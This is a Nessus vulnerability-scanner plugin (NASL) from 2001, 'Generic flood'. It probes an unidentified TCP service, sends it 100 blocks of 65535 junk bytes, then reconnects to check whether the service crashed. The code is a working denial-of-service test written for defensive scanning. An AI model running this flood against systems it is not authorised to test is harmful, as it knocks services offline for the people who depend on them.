#
# This script was written by Michel Arboi <arboi@algoriel.fr>, starting 
# from winnuke.nasl, then fixed and heavily hacked by Renaud Deraison
# (as usual :) 
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10735);
 script_version ("$Revision: 1.12 $");
 
 name["english"] = "Generic flood";
 name["francais"] = "Surcharge gnrique";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It was possible to crash
the remote service by flooding it with crap.

An attacker may use this flaw to make this
service crash continuously, preventing you
from working properly.


Solution: upgrade your software or contact your vendor
and inform it of this vulnerability

Risk factor : Medium";


 desc["francais"] = "Il a t possible de tuer 
le service distant en l'inondant de donnes.

Un pirate peut exploiter cette faille 
pour faire planter continuellement ce
service, vous empchant ainsi de travailler
correctement.


Solution: mettez  jour votre logiciel ou 
contactez votre vendeur et informez-le de cette
vulnrabilit.

Facteur de risque : Moyen";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Flood against the remote service";
 summary["francais"] = "Surcharge du service distant";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 # Maybe we should set this to ACT_DESTRUCTIVE_ATTACK only?
 script_category(ACT_DENIAL); 
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison & Michel Arboi",
		francais:"Ce script est Copyright (C) 2001 Renaud Deraison & Michel Arboi");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";

 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/unknown");
 exit(0);
}

#

port = get_kb_item("Services/unknown");
if (! port) exit(0);
if (! get_port_state(port)) exit(0);

 soc = open_sock_tcp(port);
 if (! soc)
 {
  # This code taken from check_ports.nasl
  state = get_kb_item(string("Ports/tcp/", port));
  if (state)
   security_warning(port:port, data:"The port was detected as opened by scanner but is now closed. The service may have been crashed by some other test");
  exit(0);
 }

 r = recv(socket:soc, length:4096, timeout:5);
 if(!r) has_banner = 0;
 else has_banner = 1;
 if(!has_banner)
 {
   send(socket:soc, data:string("HELP\r\n"));
   r = recv(socket:soc, length:4096, timeout:5);
   if(r)replies_to_help = 1;
   else replies_to_help = 0;
 }

 close(soc);


 soc = open_sock_tcp(port);
 send(socket:soc, data:crap(65535)) x 100;
 close(soc);

 soc = open_sock_tcp(port);
 if(!soc)
 {
  security_hole(port);
 }
 else
 {
  if(has_banner)
  {
   r = recv(socket:soc, length:4096, timeout:10);
   if(!r) {
    security_hole(port);
   }
  }
  else
  {
   if(replies_to_help)
   {
    send(socket:soc, data:string("HELP\r\n"));
    r =  recv(socket:soc, length:4096, timeout:10);
    if(!r)
    {
     security_hole(port);
    }
   }
  }
 }

